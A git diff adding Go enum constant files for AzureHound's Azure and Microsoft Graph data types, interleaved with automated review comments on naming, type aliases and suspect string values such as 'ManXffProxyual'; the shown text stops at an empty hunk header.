diff --git a/enums/dayofweek.go b/enums/dayofweek.go
new file mode 100644
index 0000000..c61b08b
--- /dev/null
+++ b/enums/dayofweek.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type DayOfWeek string
+
+const (
+ DayOfWeekMonday DayOfWeek = "monday"
+ DayOfWeekTuesday DayOfWeek = "tuesday"
+ DayOfWeekWednesday DayOfWeek = "wednesday"
+ DayOfWeekThursday DayOfWeek = "thursday"
+ DayOfWeekFriday DayOfWeek = "friday"
+ DayOfWeekSaturday DayOfWeek = "saturday"
+ DayOfWeekSunday DayOfWeek = "sunday"
+)
diff --git a/enums/deviceprofile.go b/enums/deviceprofile.go
new file mode 100644
index 0000000..9f2c3ee
--- /dev/null
+++ b/enums/deviceprofile.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type DeviceProfile string
+
+const (
+ DeviceProfileRegisteredDevice DeviceProfile = "RegisteredDevice"
+ DeviceProfileSecureVM DeviceProfile = "SecureVM"
+ DeviceProfilePrinter DeviceProfile = "Printer"
+ DeviceProfileShared DeviceProfile = "Shared"
+ DeviceProfileIoT DeviceProfile = "IoT"
+)
diff --git a/enums/directory_service_options.go b/enums/directory_service_options.go
new file mode 100644
index 0000000..4d6b320
--- /dev/null
+++ b/enums/directory_service_options.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type DirectoryServiceOptions string
+
+const (
+ AADDSService DirectoryServiceOptions = "AADDS"
+ ADService DirectoryServiceOptions = "AD"
+ NoService DirectoryServiceOptions = "None"
+)
diff --git a/enums/dns_endpoint_type.go b/enums/dns_endpoint_type.go
new file mode 100644
index 0000000..3404360
--- /dev/null
+++ b/enums/dns_endpoint_type.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type DnsEndpointType string
+
+const (
+ AzureDnsZone DnsEndpointType = "AzureDnsZone"
+ StandardZone DnsEndpointType = "Standard"
+)
diff --git a/enums/encryption_key_source_type.go b/enums/encryption_key_source_type.go
new file mode 100644
index 0000000..638290f
--- /dev/null
+++ b/enums/encryption_key_source_type.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type EncryptionKeySourceType string
+
+const (
+ AutomationSource EncryptionKeySourceType = "Microsoft.Automation"
+ KeyvaultSource EncryptionKeySourceType = "Microsoft.Keyvault"
+ StorageSource EncryptionKeySourceType = "Microsoft.Storage"
+)
diff --git a/enums/encryption_key_type.go b/enums/encryption_key_type.go
new file mode 100644
index 0000000..fb5ccc8
--- /dev/null
+++ b/enums/encryption_key_type.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type EncryptionKeyType string
+
+const (
+ AccountKeyType EncryptionKeyType = "Account"
+ ServiceKeyType EncryptionKeyType = "Service"
+)
diff --git a/enums/endpointconnectionstatus.go b/enums/endpointconnectionstatus.go
new file mode 100644
index 0000000..5d4a008
--- /dev/null
+++ b/enums/endpointconnectionstatus.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+// The private endpoint connection status.
+type EndpointConnectionStatus string
+
+const (
+ EndpointConnectionStatusApproved EndpointConnectionStatus = "Approved"
+ EndpointConnectionStatusDisconnect EndpointConnectionStatus = "Disconnected"
+ EndpointConnectionStatusPending EndpointConnectionStatus = "Pending"
+ EndpointConnectionStatusRejected EndpointConnectionStatus = "Rejected"
+)
diff --git a/enums/endpointprovisioningstate.go b/enums/endpointprovisioningstate.go
new file mode 100644
index 0000000..d7a26b9
--- /dev/null
+++ b/enums/endpointprovisioningstate.go
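Review bot: `EndpointConnectionStatusDisconnect` does not match the value it holds, `"Disconnected"`, nor its sibling `EndpointProvisioningStateDisconnected` in enums/endpointprovisioningstate.go. The other three constants in this block are named after their string value, so a caller searching for the `Disconnected` state will not find this one by name. I would rename it while the file is new: `EndpointConnectionStatusDisconnected EndpointConnectionStatus = "Disconnected"`.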
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+// The private endpoint provisioning state.
+type EndpointProvisioningState string
+
+const (
+ EndpointProvisioningStateCreating EndpointProvisioningState = "Creating"
+ EndpointProvisioningStateDeleting EndpointProvisioningState = "Deleting"
+ EndpointProvisioningStateDisconnected EndpointProvisioningState = "Disconnected"
+ EndpointProvisioningStateFailed EndpointProvisioningState = "Failed"
+ EndpointProvisioningStateSucceeded EndpointProvisioningState = "Succeeded"
+ EndpointProvisioningStateUpdating EndpointProvisioningState = "Updating"
+)
diff --git a/enums/entity.go b/enums/entity.go
new file mode 100644
index 0000000..63724f3
--- /dev/null
+++ b/enums/entity.go
@@ -0,0 +1,62 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type Entity = string
+
+const (
+ EntityUser Entity = "#microsoft.graph.user"
+ EntityInvitation Entity = "#microsoft.graph.invitation"
+ EntityAppTemplate Entity = "#microsoft.graph.applicationTemplate"
+ EntityAuthMethodConfig Entity = "#microsoft.graph.authenticationMethodConfiguration"
+ EntityIdentityProvider Entity = "#microsoft.graph.identityProvider"
+ EntityApplication Entity = "#microsoft.graph.application"
+ EntityCertBasedAuthConfig Entity = "#microsoft.graph.certificateBasedAuthConfiguration"
+ EntityOrgContact Entity = "#microsoft.graph.orgContact"
+ EntityContract Entity = "#microsoft.graph.contract"
+ EntityDevice Entity = "#microsoft.graph.device"
+ EntityDirectoryObject Entity = "#microsoft.graph.directoryObject"
+ EntityDirectoryRole Entity = "#microsoft.graph.directoryRole"
+ EntityDirectoryRoleTemplate Entity = "#microsoft.graph.directoryRoleTemplate"
+ EntityDomainDNSRecord Entity = "#microsoft.graph.domainDnsRecord"
+ EntityDomain Entity = "#microsoft.graph.domain"
+ EntityGroup Entity = "#microsoft.graph.group"
+ EntityGroupSetting Entity = "#microsoft.graph.groupSetting"
+ EntityGroupSettingTemplate Entity = "#microsoft.graph.groupSettingTemplate"
+ EntityOrgBrandingLocalization Entity = "#microsoft.graph.organizationalBrandingLocalization"
+ EntityOAuth2PermissionGrant Entity = "#microsoft.graph.oAuth2PermissionGrant"
+ EntityOrganization Entity = "#microsoft.graph.organization"
+ EntityResourcePermissionGrant Entity = "#microsoft.graph.resourceSpecificPermissionGrant"
+ EntityScopedRoleMembership Entity = "#microsoft.graph.scopedRoleMembership"
+ EntityServicePrincipal Entity = "#microsoft.graph.servicePrincipal"
+ EntitySubscribedSku Entity = "#microsoft.graph.subscribedSku"
+ EntityPlace Entity = "#microsoft.graph.place"
+ EntityDrive Entity = "#microsoft.graph.drive"
+ EntitySharedDriveItem Entity = "#microsoft.graph.sharedDriveItem"
+ EntitySite Entity = "#microsoft.graph.site"
+ EntitySchemaExt Entity = "#microsoft.graph.schemaExtension"
+ EntityGroupLifecyclePolicy Entity = "#microsoft.graph.groupLifecyclePolicy"
+ EntityAgreementAcceptance Entity = "#microsoft.graph.agreementAcceptance"
+ EntityAgreement Entity = "#microsoft.graph.agreement"
+ EntityDataPolicyOperation Entity = "#microsoft.graph.dataPolicyOperation"
+ EntitySubscription Entity = "#microsoft.graph.subscription"
+ EntityExternalConnection Entity = "#microsoft.graph.externalConnection"
+ EntityChat Entity = "#microsoft.graph.chat"
+ EntityTeam Entity = "#microsoft.graph.team"
+ EntityTeamsTemplate Entity = "#microsoft.graph.teamsTemplate"
+)
diff --git a/enums/externalaudiencescope.go b/enums/externalaudiencescope.go
new file mode 100644
index 0000000..614f642
--- /dev/null
+++ b/enums/externalaudiencescope.go
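Review bot: `type Entity = string` in enums/entity.go is a type alias, not a defined type, so `Entity` and `string` are the same type and the compiler accepts any string wherever an `Entity` is expected. Every other enum in this patch is a defined type (`type AutoReplyStatus string`, `type Identity string`, and so on). These constants are the discriminators that tell users, groups, service principals and devices apart, so a mistyped or unvalidated string passed as an `Entity` would fail silently rather than at compile time. If the alias is not deliberate I would write `type Entity string`; if it is there so that values compare directly against a plain string field decoded from the API (presumably `@odata.type`), a comment saying so on the type would prevent it from being "fixed" later.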
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type ExternalAudienceScope string
+
+const (
+ ExternalAudienceScopeNone ExternalAudienceScope = "none"
+ ExternalAudienceScopeContactsOnly ExternalAudienceScope = "contactsOnly"
+ ExternalAudienceScopeAll ExternalAudienceScope = "all"
+)
diff --git a/enums/externaluserstate.go b/enums/externaluserstate.go
new file mode 100644
index 0000000..2ce35da
--- /dev/null
+++ b/enums/externaluserstate.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type ExternalUserState string
+
+const (
+ ExternalUserStateAccepted ExternalUserState = "Accepted"
+ ExternalUserStatePendingAcceptance ExternalUserState = "PendingAcceptance"
+)
diff --git a/enums/ftps_state.go b/enums/ftps_state.go
new file mode 100644
index 0000000..6567f80
--- /dev/null
+++ b/enums/ftps_state.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type FtpsState string
+
+const (
+ AllAllowedFtpsState FtpsState = "AllAllowed"
+ DisabledFtpsState FtpsState = "Disabled"
+ FtpsOnlyFtpsState FtpsState = "FtpsOnly"
+)
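Review bot: `FtpsState` in enums/ftps_state.go has no doc comment on the type or on any of its three values, and the difference between them is what a reader auditing collected app configuration needs to know. I would add `// FtpsState is the FTP/FTPS deployment setting reported for an app.` above the type and one line per constant, for example `// AllAllowedFtpsState: both FTP and FTPS are accepted, so plain FTP is not ruled out.` and `// FtpsOnlyFtpsState: only FTPS is accepted.`. That reading of "AllAllowed" comes from the Azure App Service setting of the same name and should be confirmed against the API reference before it is written down as fact.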
diff --git a/enums/generic_enabled_disabled.go b/enums/generic_enabled_disabled.go
new file mode 100644
index 0000000..c148dbd
--- /dev/null
+++ b/enums/generic_enabled_disabled.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type GenericEnabledDisabled string
+
+const (
+ Enabled GenericEnabledDisabled = "Enabled"
+ Disabled GenericEnabledDisabled = "Disabled"
+)
diff --git a/enums/geo_replication_status.go b/enums/geo_replication_status.go
new file mode 100644
index 0000000..9ec93c0
--- /dev/null
+++ b/enums/geo_replication_status.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type GeoReplicationStatus string
+
+const (
+ BootstrapStatus GeoReplicationStatus = "Bootstrap"
+ LiveStatus GeoReplicationStatus = "Live"
+ Unavailable GeoReplicationStatus = "Unavailable"
+)
diff --git a/enums/groupvisibility.go b/enums/groupvisibility.go
new file mode 100644
index 0000000..7d8fb59
--- /dev/null
+++ b/enums/groupvisibility.go
@@ -0,0 +1,38 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+// Specifies the group join policy and group content visibility for groups.
+type GroupVisibility string
+
+const (
+ // Owner permission is needed to join the group.
+ // Non-members cannot view the contents of the group.
+ GroupVisibilityPrivate GroupVisibility = "Private"
+
+ // Anyone can join the group without needing owner permission.
+ // Anyone can view the contents of the group.
+ GroupVisibilityPublic GroupVisibility = "Public"
+
+ // Owner permission is needed to join the group.
+ // Non-members cannot view the contents of the group.
+ // Non-members cannot see the members of the group.
+ // Administrators (global, company, user, and helpdesk) can view the membership of the group.
+ // The group appears in the global address book (GAL).
+ GroupVisibilityHidden GroupVisibility = "Hiddenmembership"
+)
diff --git a/enums/hosttype.go b/enums/hosttype.go
new file mode 100644
index 0000000..998f891
--- /dev/null
+++ b/enums/hosttype.go
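Review bot: `GroupVisibilityHidden` is set to `"Hiddenmembership"` with a lower-case "m", while Microsoft Graph, as far as I know, documents this visibility value as `HiddenMembership`. Go string comparison is case-sensitive, so if this constant is compared with `==` against what the API returns, groups with hidden membership would not be recognised as such; whether that happens depends on call sites outside this hunk. I would either spell it as the API does, `GroupVisibilityHidden GroupVisibility = "HiddenMembership"`, or make the comparison explicit with `strings.EqualFold` where the value is read, and in both cases confirm the casing against a real response.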
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type HostType string
+
+const (
+ RepositoryHostType HostType = "Repository"
+ StandardHostType HostType = "Standard"
+)
diff --git a/enums/hypervgeneration.go b/enums/hypervgeneration.go
new file mode 100644
index 0000000..0cb8dae
--- /dev/null
+++ b/enums/hypervgeneration.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type HyperVGeneration string
+
+const (
+ HyperVGenerationV1 HyperVGeneration = "V1"
+ HyperVGenerationV2 HyperVGeneration = "V2"
+)
diff --git a/enums/identity.go b/enums/identity.go
new file mode 100644
index 0000000..acd6b4e
--- /dev/null
+++ b/enums/identity.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+// The type of Identity used for the virtual machine.
+// The type 'SystemAssigned, UserAssigned' includes both an implicitly created Identity and a set of user assigned
+// identities. The type 'None' will remove any identities from the virtual machine.
+type Identity string
+
+const (
+ IdentityNone Identity = "None"
+ IdentitySystemAssigned Identity = "SystemAssigned"
+ IdentitySystemAssignedUserAssigned Identity = "SystemAssigned, UserAssigned"
+ IdentityUserAssigned Identity = "UserAssigned"
+)
diff --git a/enums/immutability_policy_state.go b/enums/immutability_policy_state.go
new file mode 100644
index 0000000..e4fc85f
--- /dev/null
+++ b/enums/immutability_policy_state.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type ImmutabilityPolicyState string
+
+const (
+ LockedPolicyState ImmutabilityPolicyState = "Locked"
+ UnlockedPolicyState ImmutabilityPolicyState = "Unlocked"
+)
diff --git a/enums/immutability_policy_update_type.go b/enums/immutability_policy_update_type.go
new file mode 100644
index 0000000..879e6e6
--- /dev/null
+++ b/enums/immutability_policy_update_type.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type ImmutabilityPolicyUpdateType string
+
+const (
+ ExtendUpdateType ImmutabilityPolicyUpdateType = "extend"
+ LockUpdateType ImmutabilityPolicyUpdateType = "lock"
+ PutUpdateType ImmutabilityPolicyUpdateType = "put"
+)
diff --git a/enums/ip_filter_tag.go b/enums/ip_filter_tag.go
new file mode 100644
index 0000000..341d53b
--- /dev/null
+++ b/enums/ip_filter_tag.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type IpFilterTag string
+
+const (
+ DefaultIpFilterTag IpFilterTag = "Default"
+ ServiceTagIpFilterTag IpFilterTag = "ServiceTag"
+ XffProxyIpFilterTag IpFilterTag = "ManXffProxyual"
+)
diff --git a/enums/ipallocationmethod.go b/enums/ipallocationmethod.go
new file mode 100644
index 0000000..eaa4449
--- /dev/null
+++ b/enums/ipallocationmethod.go
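Review bot: In enums/ip_filter_tag.go the value of `XffProxyIpFilterTag` is `"ManXffProxyual"`, which looks like a search-and-replace applied to the word "Manual" rather than a tag the API returns; the App Service IP restriction tags are `Default`, `ServiceTag` and `XffProxy`. A rule tagged `XffProxy` will never compare equal to this constant, so any code that keys on it would silently skip restrictions based on the forwarded-for header. Change the line to `XffProxyIpFilterTag IpFilterTag = "XffProxy"`, and add a doc comment on `IpFilterTag` naming the API field it mirrors so a mismatch like this is easier to spot.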
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type IPAllocationMethod string
+
+const (
+ IPAllocationMethodDynamic IPAllocationMethod = "Dynamic"
+ IPAllocationMethodStatic IPAllocationMethod = "Static"
+)
diff --git a/enums/ipsku.go b/enums/ipsku.go
new file mode 100644
index 0000000..10a55ca
--- /dev/null
+++ b/enums/ipsku.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type IPSku string
+
+const (
+ IPSkuBasic IPSku = "Basic"
+ IPSkuStandard IPSku = "Standard"
+)
diff --git a/enums/ipskutier.go b/enums/ipskutier.go
new file mode 100644
index 0000000..ae6d455
--- /dev/null
+++ b/enums/ipskutier.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type IPSkuTier string
+
+const (
+ IPSkuTierGlobal IPSkuTier = "Global"
+ IPSkuTierRegional IPSkuTier = "Regional"
+)
diff --git a/enums/key-vault-access-type.go b/enums/key-vault-access-type.go
new file mode 100644
index 0000000..d0a2fed
--- /dev/null
+++ b/enums/key-vault-access-type.go
@@ -0,0 +1,34 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type KeyVaultAccessType = string
+
+const (
+ GetCerts KeyVaultAccessType = "GetCerts"
+ GetKeys KeyVaultAccessType = "GetKeys"
+ GetSecrets KeyVaultAccessType = "GetSecrets"
+)
+
+func KeyVaultAccessPolicies() []KeyVaultAccessType {
+ return []KeyVaultAccessType{
+ GetCerts,
+ GetKeys,
+ GetSecrets,
+ }
+}
diff --git a/enums/kind.go b/enums/kind.go
new file mode 100644
index 0000000..9d3fbd9
--- /dev/null
+++ b/enums/kind.go
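Review bot: In enums/key-vault-access-type.go, `type KeyVaultAccessType = string` is a type alias, not a defined type like the other enums in this package, so the compiler accepts any plain string where a `KeyVaultAccessType` is expected and a mistyped access type goes unnoticed. If no caller relies on the alias (callers are not visible in this hunk), declare it as `type KeyVaultAccessType string`. The exported `KeyVaultAccessPolicies` also has no doc comment; `// KeyVaultAccessPolicies returns every KeyVaultAccessType defined in this package.` would state its contract.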
@@ -0,0 +1,83 @@
